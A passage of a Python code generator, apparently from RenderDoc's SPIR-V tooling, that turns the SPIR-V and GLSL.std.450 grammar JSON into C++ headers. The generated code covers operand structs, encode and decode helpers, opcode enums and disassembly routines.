operand_kind['def_value'] = '{Id(), Id()}'
operand_kind['type'] = name
operand_kind['push_words'] = lambda name: 'words.push_back({0}.first.value()); words.push_back({0}.second.value());'.format(name)
ops_header.write('struct {} {{ Id first, second; }};\n\n'.format(name))
continue
else:
raise TypeError("Unexpected operand {} of type {}".format(operand_kind['kind'], operand_kind['category']))
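    # Bind the current operand_kind via a default argument: Python closures
    # capture variables late, so a bare lambda here would see the last loop
    # value rather than this iteration's kind.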
if operand_kind['from_words'] is None:
operand_kind['from_words'] = lambda name,kind=operand_kind: '({}){}'.format(kind['type'], name)
ops_header.write('''
template<>
inline PairIdRefIdRef DecodeParam(const ConstIter &it, uint32_t &word)
{
if(word >= it.size()) return {};
PairIdRefIdRef ret = { Id::fromWord(it.word(word)), Id::fromWord(it.word(word+1)) };
word += 2;
return ret;
}
template<>
inline PairLiteralIntegerIdRef DecodeParam(const ConstIter &it, uint32_t &word)
{
if(word >= it.size()) return {};
PairLiteralIntegerIdRef ret = { it.word(word), Id::fromWord(it.word(word+1)) };
word += 2;
return ret;
}
template<>
inline PairIdRefLiteralInteger DecodeParam(const ConstIter &it, uint32_t &word)
{
if(word >= it.size()) return {};
PairIdRefLiteralInteger ret = { Id::fromWord(it.word(word)), it.word(word+1) };
word += 2;
return ret;
}
''')
tostrs = ''
tostr_decls = ''
# Second pass to declare operand parameter structs in ops helper header
for operand_kind in spirv['operand_kinds']:
name = operand_kind['kind']
if not operand_kind['has_params']:
if operand_kind['category'] == 'ValueEnum':
ops_header.write('inline uint16_t OptionalWordCount(const {0} val) {{ return val != {0}::Invalid ? 1 : 0; }}\n\n'.format(name))
continue
values = ''
set_unset = ''
word_count_cases = ''
decode_cases = ''
encode_cases = ''
constructors = ''
tostr_cases = ''
value_enum = operand_kind['category'] == 'ValueEnum'
bit_enum = operand_kind['category'] == 'BitEnum'
used = []
for value in operand_kind['enumerants']:
params = ''
assign = ''
ret_assign = ''
new_value = value['value'] not in used
used.append(value['value'])
if new_value and bit_enum:
tostr_cases += ' if(el.flags & {0}::{1})\n ret += "{1}"'.format(name, value['enumerant'])
if 'parameters' in value:
# We want plain unions, so don't include strings
if any([param['kind'] == 'LiteralString' for param in value['parameters']]):
continue
if new_value and value_enum:
tostr_cases += ' case {0}::{1}:\n ret += '.format(name, value['enumerant'])
member = ""
param_name = operand_name(value['enumerant'])
size = 0
if new_value:
if value_enum:
decode_cases += ' case {0}::{1}:\n'.format(name, value['enumerant'])
encode_cases += ' case {0}::{1}:\n'.format(name, value['enumerant'])
else:
decode_cases += ' if(ret.flags & {0}::{1})\n {{\n'.format(name, value['enumerant'])
encode_cases += ' if(param.flags & {0}::{1})\n {{\n'.format(name, value['enumerant'])
            # if we only have one parameter, embed it directly as the member
if len(value['parameters']) == 1:
param = value['parameters'][0]
size += kinds[param['kind']]['size']
param_type = kinds[param['kind']]['type']
member = "{} {};\n".format(param_type, param_name)
if value_enum:
values += ' '
if new_value:
decode_cases += ' '
encode_cases += ' '
values += " " + member
params += "{} {}Param".format(param_type, param_name)
assign += " {0} = {0}Param;".format(param_name)
ret_assign += " ret.{0} = {0};\n".format(param_name)
if new_value:
decode_cases += ' ret.{} = {};\n'.format(param_name, kinds[param['kind']]['from_words']('it.word(word)'))
encode_cases += ' {}\n'.format(kinds[param['kind']]['push_words']('param.{}'.format(param_name)))
if kinds[param['kind']]['is_id']:
tostr_cases += ' "(" + idName(el.{}) + ")"'.format(param_name)
else:
tostr_cases += ' "(" + ToStr(el.{}) + ")"'.format(param_name)
            # if we have multiple parameters we need a separate struct for them
else:
struct_name = param_name[0].upper() + param_name[1:] + 'Params'
member = "{} {};\n".format(struct_name, param_name)
if value_enum:
values += ' '
values += " " + member
struct_values = ''
if new_value:
tostr_cases += ' "("'
for i,param in enumerate(value['parameters']):
subparam_name = positional_names[i]
kind = kinds[param['kind']]
size += kind['size']
if 'name' in param:
subparam_name = operand_name(param['name'])
struct_values += " {} {};\n".format(kind['type'], subparam_name)
if new_value:
if value_enum:
decode_cases += ' '
encode_cases += ' '
decode_cases += ' ret.{}.{} = {};\n'.format(param_name, subparam_name, kinds[param['kind']]['from_words']('it.word(word+{})'.format(i)))
encode_cases += ' {}\n'.format(kinds[param['kind']]['push_words']('param.{}.{}'.format(param_name, subparam_name)))
if kinds[param['kind']]['is_id']:
tostr_cases += ' + idName(el.{}.{}) + '.format(param_name, subparam_name)
else:
tostr_cases += ' + ToStr(el.{}.{}) + '.format(param_name, subparam_name)
assign += " {0}.{1} = {1};".format(param_name, subparam_name)
ret_assign += " ret.{0}.{1} = {0}.{1};\n".format(param_name, subparam_name)
params += "{} {}".format(kind['type'], subparam_name)
if i != len(value['parameters'])-1:
params += ", "
tostr_cases += '", " '
if new_value:
tostr_cases += '")"'
header.write('''struct {struct_name}
{{
{struct_values}
}};
'''.format(struct_name = struct_name, struct_values = struct_values.rstrip()))
if new_value:
if value_enum:
decode_cases += ' word += {};\n'.format(size)
decode_cases += ' break;\n'
encode_cases += ' break;\n'
tostr_cases += '; break;\n'
else:
decode_cases += ' word += {};\n'.format(size)
decode_cases += ' }\n'
encode_cases += ' }\n'
word_count_cases += ' case {}::{}: return {};\n'.format(name, value['enumerant'], size)
constructors += '''template<>\nstruct {name}Param<{name}::{value}>
{{
{member}
{name}Param({params}) {{ {assign} }}
operator {name}AndParamData()
{{
{name}AndParamData ret({name}::{value});
{ret_assign}
return ret;
}}
}};
'''.format(value=value['enumerant'], member=member.rstrip(), name=name, params=params, assign=assign, ret_assign=ret_assign.rstrip())
if new_value and bit_enum:
tostr_cases += ' ", ";\n'
set_unset += ''' void set{flag}({params}) {{ flags |= {name}::{flag};{assign} }}
void unset{flag}() {{ flags &= ~{name}::{flag}; }}
'''.format(flag=value['enumerant'], name=name, params=params, assign=assign)
if constructors != '':
constructors = 'template<{name} val> struct {name}Param;\n\n'.format(name=name) + constructors
# ValueEnums are set up as one or many pairs of enum/params, enum/params, etc. So we declare a struct for the pair
# and declare an array if the op wants many
if value_enum:
tostrs += '''template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcspv::{name}AndParamData &el)
{{
rdcstr ret = ToStr(el.value);
switch(el.value)
{{
{tostr_cases}
default:
break;
}}
return ret;
}}
'''.format(name=name, tostr_cases=tostr_cases.rstrip())
tostr_decls += '''template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcspv::{name}AndParamData &el);'''.format(name=name)
header.write('''struct {name}AndParamData
{{
{name}AndParamData({name} v = {name}::Invalid) : value(v) {{}}
{name} value;
union
{{
{values}
}};
operator {name}() const {{ return value; }}
bool operator ==(const {name} v) const {{ return value == v; }}
}};
'''.format(name=name, values=values.rstrip()))
ops_header.write('''{constructors}
template<>
inline {name}AndParamData DecodeParam(const ConstIter &it, uint32_t &word)
{{
if(word >= it.size()) return {name}AndParamData();
{name}AndParamData ret(({name})it.word(word));
word++;
switch(ret.value)
{{
{decode_cases}
default: break;
}}
return ret;
}}
inline void EncodeParam(rdcarray<uint32_t> &words, const {name}AndParamData &param)
{{
words.push_back((uint32_t)param.value);
switch(param.value)
{{
{encode_cases}
default: break;
}}
}}
'''.format(name=name, value_name=operand_name(name), decode_cases=decode_cases.rstrip(),
constructors=constructors, encode_cases=encode_cases.rstrip()))
operand_kind['type'] = '{}AndParamData'.format(name)
# BitEnums are set up with one bitmask, and then a series of parameters, so we declare a struct with an array
elif bit_enum:
tostrs += '''template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcspv::{name}AndParamDatas &el)
{{
rdcstr ret;
{tostr_cases}
// remove trailing ", "
if(ret.size() > 2)
ret.erase(ret.size()-2, 2);
return ret;
}}
'''.format(name=name, tostr_cases=tostr_cases.rstrip())
tostr_decls += '''template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcspv::{name}AndParamDatas &el);'''.format(name=name)
header.write('''struct {name}AndParamDatas
{{
{name}AndParamDatas({name} f = {name}::None) : flags(f) {{}}
{name} flags;
{values}
operator {name}() const {{ return flags; }}
bool operator &(const {name} v) const {{ return bool(flags & v); }}
{set_unset}
}};
'''.format(name=name, values=values.rstrip(), set_unset=set_unset.rstrip()))
ops_header.write('''template<>
inline {name}AndParamDatas DecodeParam(const ConstIter &it, uint32_t &word)
{{
if(word >= it.size()) return {name}AndParamDatas();
{name}AndParamDatas ret(({name})it.word(word));
word++;
{decode_cases}
return ret;
}}
inline void EncodeParam(rdcarray<uint32_t> &words, const {name}AndParamDatas &param)
{{
words.push_back((uint32_t)param.flags);
{encode_cases}
}}
'''.format(name=name, decode_cases=decode_cases.rstrip(), encode_cases=encode_cases.rstrip()))
operand_kind['type'] = '{}AndParamDatas'.format(name)
else:
raise TypeError("unexpected operand kind {} with parameters".format(operand_kind['category']))
ops_header.write('''inline uint16_t ExtraWordCount(const {name} {value_name})
{{
switch({value_name})
{{
{word_count_cases}
default: break;
}}
return 0;
}}
'''.format(name = name, value_name = operand_name(name), word_count_cases = word_count_cases.rstrip()))
ops_header.write('''
inline uint16_t ExtraWordCount(const rdcstr &val)
{
return uint16_t(val.size() / 4);
}
inline uint16_t OptionalWordCount(const rdcstr &val)
{
if(val.empty()) return 0;
return uint16_t(val.size() / 4) + 1;
}
inline uint16_t OptionalWordCount(const Id &val)
{
return val != Id() ? 1 : 0;
}
inline uint16_t OptionalWordCount(const PairIdRefLiteralInteger &val)
{
return val.first != Id() ? 2 : 0;
}
inline uint16_t OptionalWordCount(const PairLiteralIntegerIdRef &val)
{
return val.second != Id() ? 2 : 0;
}
inline uint16_t OptionalWordCount(const PairIdRefIdRef &val)
{
return val.first != Id() ? 2 : 0;
}
template<typename Type>
uint16_t MultiWordCount(const rdcarray<Type> &multiParams)
{
uint16_t ret = 0;
for(size_t i=0; i < multiParams.size(); i++)
ret += sizeof(multiParams[i])/sizeof(uint32_t);
return ret;
}
''')
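# MultiWordCount's sizeof(Type)/sizeof(uint32_t) works because every type used
# with a '*' quantifier here (Id, uint32_t, the pair structs) is a plain
# struct of 32-bit words; strings with a '*' quantifier are rejected with an
# error by the instruction loop below.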
###############################################################################
##
## Opcodes (declare enum / stringise)
##
###############################################################################
# Quick preprocessing pass: find operands with duplicated names and disambiguate them with a numeric suffix
for inst in spirv['instructions']:
if 'operands' in inst:
operands = inst['operands']
duplicates = []
for i,A in enumerate(operands):
for j,B in enumerate(operands):
if j <= i:
continue
a = operand_name(A['name'] if 'name' in A else kinds[A['kind']]['def_name'])
b = operand_name(B['name'] if 'name' in B else kinds[B['kind']]['def_name'])
if a == b:
if i not in duplicates:
duplicates.append(i)
if j not in duplicates:
duplicates.append(j)
if len(duplicates) > 0:
for idx,arg in enumerate(duplicates):
A = operands[arg]
operands[arg]['name'] = operand_name(A['name'] if 'name' in A else kinds[A['kind']]['def_name']) + str(idx)
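# For example, an instruction with two unnamed IdRef operands would otherwise
# produce two members both named 'id'; after this pass they become 'id0' and
# 'id1'.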
used = []
decl = ''
stringise = ''
op_structs = ''
op_decoder = ''
used_ids = ''
disassemble = ''
for inst in spirv['instructions']:
decl += ' {} = {},\n'.format(inst['opname'][2:], inst['opcode'])
if inst['opcode'] in used:
continue
stringise += ' STRINGISE_ENUM_CLASS({});\n'.format(inst['opname'][2:])
result = -1
resultCount = 0
resultType = -1
used_ids += ' case rdcspv::Op::{}:\n'.format(inst['opname'][2:])
operands = []
if 'operands' in inst:
operands = inst['operands']
last_operand = operands[-1]
for i,operand in enumerate(operands):
if operand['kind'] == 'IdResult':
result = i+1
resultCount += 1
elif 'name' in operand and operand['name'][0:6] == 'result':
resultCount += 1
if operand['kind'] == 'IdResultType':
resultType = i+1
disassemble += ' case rdcspv::Op::{}:\n'.format(inst['opname'][2:])
disassemble += ' {\n'
if any([kinds[operand['kind']]['size'] is None for operand in operands]):
op_struct = 'struct {}; // has operands with variable sizes\n\n'.format(inst['opname'])
        disassemble += '      OpDecoder decoded(it);\n'
if resultCount == 2:
raise ValueError("Unexpected multiple results without decoded opcode")
elif resultType > 0 and result > 0:
disassemble += ' ret += declName(decoded.resultType, decoded.result) + " = ";\n'
elif resultType > 0 and result == -1:
raise ValueError("Unexpected result type without result")
elif resultType == -1 and result > 0:
disassemble += ' ret += idName(decoded.result) + " = ";\n'
disassemble += ' ret += "{}(...)";\n'.format(inst['opname'][2:])
disassemble += ' break;\n'
disassemble += ' }\n'
else:
params = ''
assign = ''
member_decl = ''
size_name = 'FixedWordSize'
construct_size = 'FixedWordSize'
size = 1 # opcode / wordcount packed
all_size = 1 # size, but with all optionals included
iter_init = ' memcpy(this, it.words(), sizeof(*this));'
complex_type = False
manual_init = ' this->op = OpCode;\n'
manual_init += ' this->wordCount = (uint16_t)it.size();\n'
oper_cast = ' operator Operation() const\n {\n rdcarray<uint32_t> words;\n'
has_funcs = ''
disassemble += ' Op{} decoded(it);\n'.format(inst['opname'][2:])
if resultCount == 2:
disassemble += ' ret += declName(decoded.resultType, decoded.result0) + ", " + idName(decoded.result1) + " = ";\n'
elif resultType > 0 and result > 0:
disassemble += ' ret += declName(decoded.resultType, decoded.result) + " = ";\n'
elif resultType > 0 and result == -1:
raise ValueError("Unexpected result type without result")
elif resultType == -1 and result > 0:
disassemble += ' ret += idName(decoded.result) + " = ";\n'
disassemble += ' ret += "{}("'.format(inst['opname'][2:])
disassemble_params = False
if 'operands' in inst:
for i,operand in enumerate(operands):
kind = kinds[operand['kind']]
if kind['has_params'] and not complex_type:
size_name = 'MinWordSize'
construct_size = 'MinWordSize'
complex_type = True
manual_init += ' uint32_t word = {};\n'.format(all_size)
quantifier = ''
if 'quantifier' in operand:
quantifier = operand['quantifier']
if not complex_type:
size_name = 'MinWordSize'
construct_size = 'MinWordSize'
complex_type = True
if quantifier == '*':
manual_init += ' uint32_t word = {};\n'.format(all_size)
if kind['is_id']:
if quantifier == '*':
used_ids += ' for(size_t i=0; i < size-{0}; i++) callback(Id::fromWord(it.word({0}+i)), {1});\n'.format(all_size, 'true' if i+1==result else 'false')
else:
used_ids += ' callback(Id::fromWord(it.word({})), {});\n'.format(all_size, 'true' if i+1==result else 'false')
if kind['size'] < 0:
size_name = 'MinWordSize'
construct_size = 'MinWordSize'
complex_type = True
manual_init += ' uint32_t word = {};\n'.format(all_size)
opType,opName = (kind['type'], operand_name(operand['name'] if 'name' in operand else kind['def_name']))
if i+1 != resultType and i+1 != result:
if quantifier == '*':
disassemble += ' + ParamsToStr(idName, decoded.{})'.format(opName)
else:
if opType == 'IdScope':
disassemble += ' + ToStr(Scope(constIntVal(decoded.{})))'.format(opName)
elif opType == 'IdMemorySemantics':
disassemble += ' + ToStr(MemorySemantics(constIntVal(decoded.{})))'.format(opName)
else:
disassemble += ' + ParamToStr(idName, decoded.{})'.format(opName)
if i+1 < len(operands):
disassemble += ' + ", "'
disassemble_params = True
if quantifier == '?':
params += '{} {} = {}, '.format(opType, opName, kind['def_value'])
elif quantifier == '*':
params += 'const rdcarray<{}> &{} = {{}}, '.format(opType, opName)
else:
params += '{} {}, '.format(opType, opName)
if quantifier == '*':
member_decl += ' rdcarray<{}> {};\n'.format(opType, opName)
else:
member_decl += ' {} {};\n'.format(opType, opName)
assign += ' this->{} = {};\n'.format(opName, opName)
if operand['kind'] == 'LiteralString':
if quantifier == '*':
raise ValueError('operand {} in {} is string but has * quantifier'.format(opName, inst['opname']))
manual_init += ' this->{name} = DecodeParam<{type}>(it, word);\n'.format(name = opName, type = opType)
oper_cast += ' EncodeParam(words, {name});\n'.format(name = opName)
if quantifier == '?':
construct_size += ' + OptionalWordCount({})'.format(opName)
has_funcs += ' bool Has{name}() const {{ return wordCount > {idx}; }}\n'.format(idx = all_size, name = opName[0].upper() + opName[1:])
else:
construct_size += ' + ExtraWordCount({})'.format(opName)
elif kind['has_params']:
if quantifier == '*':
raise ValueError('operand {} in {} has * quantifier and params'.format(opName, inst['opname']))
manual_init += ' this->{name} = DecodeParam<{type}>(it, word);\n'.format(name = opName, type = opType)
oper_cast += ' EncodeParam(words, {name});\n'.format(name = opName)
construct_size += ' + ExtraWordCount({})'.format(opName)
elif quantifier == '*':
manual_init += ' this->{name} = MultiParam<{type}>(it, word);\n'.format(name = opName, type = opType)
construct_size += ' + MultiWordCount({})'.format(opName)
oper_cast += ' for(size_t i=0; i < {name}.size(); i++)\n'.format(name = opName)
oper_cast += ' {\n'
oper_cast += ' {push_words}\n'.format(push_words = kind['push_words']('{}[i]'.format(opName)))
oper_cast += ' }\n'
elif quantifier == '?':
manual_init += ' this->{name} = (it.size() > {idx}) ? {value} : {def_value};\n'.format(name = opName, type = opType, idx = all_size, value = kind['from_words']('it.word({})'.format(all_size)), def_value=kind['def_value'])
construct_size += ' + OptionalWordCount({})'.format(opName)
oper_cast += ' if({name} != {def_value}) {push_words}\n'.format(name = opName, def_value=kind['def_value'], push_words = kind['push_words'](opName))
has_funcs += ' bool Has{name}() const {{ return wordCount > {idx}; }}\n'.format(idx = all_size, name = opName[0].upper() + opName[1:])
else:
manual_init += ' this->{name} = {value};\n'.format(name = opName, type = opType, value = kind['from_words']('it.word({})'.format(all_size)))
oper_cast += ' {push_words}\n'.format(push_words = kind['push_words'](opName))
if kind['size'] >= 0:
all_size += kind['size']
else:
all_size += 1
if quantifier == '':
size = all_size
else:
assign = ' // no operands'
member_decl = ' // no operands'
if complex_type:
iter_init = manual_init.rstrip()
oper_cast += ' return Operation(OpCode, words);\n }\n'
else:
oper_cast = ''
if params != '':
params = params[0:-2]
if disassemble_params:
disassemble += ' + ")";\n'
else:
disassemble += ' ")";\n'
disassemble += ' break;\n'
disassemble += ' }\n'
if has_funcs != '':
has_funcs = '\n\n' + has_funcs
op_struct = '''struct {name}
{{
{name}(const ConstIter &it)
{{
{iter_init}
}}
{name}({params})
: op(Op::{opname})
, wordCount({construct_size})
{{
{assign}
}}
{oper_cast}
static constexpr Op OpCode = Op::{opname};
static constexpr uint16_t {size_name} = {size}U;
Op op;
uint16_t wordCount;
{member_decl}{has_funcs}
}};
'''.format(opname=inst['opname'][2:], name=inst['opname'], params=params, iter_init=iter_init, assign=assign.rstrip(),
member_decl=member_decl.rstrip(), size_name=size_name, construct_size=construct_size,
oper_cast=oper_cast, size=size, has_funcs=has_funcs.rstrip())
op_structs += op_struct
    # Sanity check that quantifiers only appear on trailing operands, and that when multiple operands have one they are all '?', never '*'
if 'operands' in inst:
operands = inst['operands']
last_operand = operands[-1]
for operand in operands:
if operand != last_operand and 'quantifier' in operand and ('quantifier' not in last_operand or last_operand['quantifier'] != operand['quantifier'] or operand['quantifier'] != '?'):
raise ValueError('quantifier on operand {} in {} but not on last operand'.format(operand['name'], inst['opname']))
used_ids += ' break;\n'
if result < 0:
result = ' result = Id();'
else:
result = ' result = Id::fromWord(it.word({}));'.format(result)
if resultType < 0:
resultType = ' resultType = Id();'
else:
resultType = ' resultType = Id::fromWord(it.word({}));'.format(resultType)
op_decoder += ' case rdcspv::Op::{}:{}{} break;\n'.format(inst['opname'][2:], result, resultType)
used.append(inst['opcode'])
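# As a rough sketch of the generated output (assuming OpUndef's only operands
# are IdResultType and IdResult), the op_struct template above produces
# approximately:
#
#   struct OpUndef
#   {
#     OpUndef(const ConstIter &it) { memcpy(this, it.words(), sizeof(*this)); }
#     OpUndef(IdResultType resultType, IdResult result)
#         : op(Op::Undef), wordCount(FixedWordSize)
#     { this->resultType = resultType; this->result = result; }
#     static constexpr Op OpCode = Op::Undef;
#     static constexpr uint16_t FixedWordSize = 3U;
#     Op op;
#     uint16_t wordCount;
#     IdResultType resultType;
#     IdResult result;
#   };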
header.write('''enum class Op : uint16_t
{{
{decl}
Max,
}};
'''.format(decl = decl))
ops_header.write('''
{op_structs}
template<typename T>
inline rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const T &el)
{{
return ToStr(el);
}}
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const Id &el);
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcstr &el);
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairLiteralIntegerIdRef &el);
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairIdRefLiteralInteger &el);
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairIdRefIdRef &el);
{tostr_decls}
template<typename U>
inline rdcstr ParamsToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcarray<U> &ids)
{{
rdcstr ret = "{{";
for(size_t i=0; i < ids.size(); i++)
{{
ret += ParamToStr(idName, ids[i]);
if(i + 1 < ids.size())
ret += ", ";
}}
ret += "}}";
return ret;
}}
struct OpDecoder
{{
OpDecoder(const ConstIter &it);
static void ForEachID(const ConstIter &it, const std::function<void(Id,bool)> &callback);
static rdcstr Disassemble(const ConstIter &it, const std::function<rdcstr(Id,Id)> &declName, const std::function<rdcstr(rdcspv::Id)> &idName, const std::function<uint32_t(Id)> &constIntVal);
Op op;
uint16_t wordCount;
Id result;
Id resultType;
}};
'''.format(op_structs = op_structs.rstrip(), tostr_decls = tostr_decls))
cpp.write('''template <>
rdcstr DoStringise(const rdcspv::Op &el)
{{
BEGIN_ENUM_STRINGISE(rdcspv::Op);
{{
{stringise}
}}
END_ENUM_STRINGISE();
}}
namespace rdcspv
{{
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const Id &el)
{{
return idName(el);
}}
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcstr &el)
{{
return "\\"" + el + "\\"";
}}
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairLiteralIntegerIdRef &el)
{{
return StringFormat::Fmt("[%u, %s]", el.first, idName(el.second).c_str());
}}
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairIdRefLiteralInteger &el)
{{
return StringFormat::Fmt("[%s, %u]", idName(el.first).c_str(), el.second);
}}
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairIdRefIdRef &el)
{{
return StringFormat::Fmt("[%s, %s]", idName(el.first).c_str(), idName(el.second).c_str());
}}
{tostrs}
void OpDecoder::ForEachID(const ConstIter &it, const std::function<void(Id,bool)> &callback)
{{
size_t size = it.size();
switch(it.opcode())
{{
{used_ids}
case Op::Max: break;
}}
}}
rdcstr OpDecoder::Disassemble(const ConstIter &it, const std::function<rdcstr(Id,Id)> &declName, const std::function<rdcstr(rdcspv::Id)> &idName, const std::function<uint32_t(Id)> &constIntVal)
{{
rdcstr ret;
switch(it.opcode())
{{
{disassemble}
case Op::Max: break;
}}
return ret;
}}
OpDecoder::OpDecoder(const ConstIter &it)
{{
op = it.opcode();
wordCount = (uint16_t)it.size();
switch(op)
{{
{op_decoder}
case Op::Max: break;
}}
}}
}}; // namespace rdcspv
'''.format(stringise = stringise.rstrip(), op_decoder = op_decoder.rstrip(), used_ids = used_ids.rstrip(), disassemble = disassemble.rstrip(), tostrs = tostrs.rstrip()));
###############################################################################
##
## GLSL ext inst set (declare enum)
##
###############################################################################
decl = ''
stringise = ''
for inst in glsl450['instructions']:
decl += ' {} = {},\n'.format(inst['opname'], inst['opcode'])
stringise += ' STRINGISE_ENUM_CLASS({});\n'.format(inst['opname'])
header.write('''enum class GLSLstd450 : uint32_t
{{
{decl}
Max,
Invalid = ~0U,
}};
'''.format(decl = decl))
cpp.write('''template <>
rdcstr DoStringise(const rdcspv::GLSLstd450 &el)
{{
BEGIN_ENUM_STRINGISE(rdcspv::GLSLstd450);
{{
{stringise}
}}
END_ENUM_STRINGISE();
}}
template <>
rdcstr DoStringise(const rdcspv::Generator &el)
{{
BEGIN_ENUM_STRINGISE(rdcspv::Generator);
{{
{generator_tostr}
}}
END_ENUM_STRINGISE();
}}
'''.format(stringise = stringise.rstrip(), generator_tostr = generator_tostr.rstrip()))
header.write('''
}; // namespace rdcspv
DECLARE_STRINGISE_TYPE(rdcspv::GLSLstd450);
DECLARE_STRINGISE_TYPE(rdcspv::Generator);
''')
for operand_kind in spirv['operand_kinds']:
if operand_kind['category'] == 'ValueEnum' or operand_kind['category'] == 'BitEnum':
header.write('DECLARE_STRINGISE_TYPE(rdcspv::{});\n'.format(operand_kind['kind']))
ops_header.write('''
}; // namespace rdcspv
''')
header.close()
ops_header.close()
cpp.close()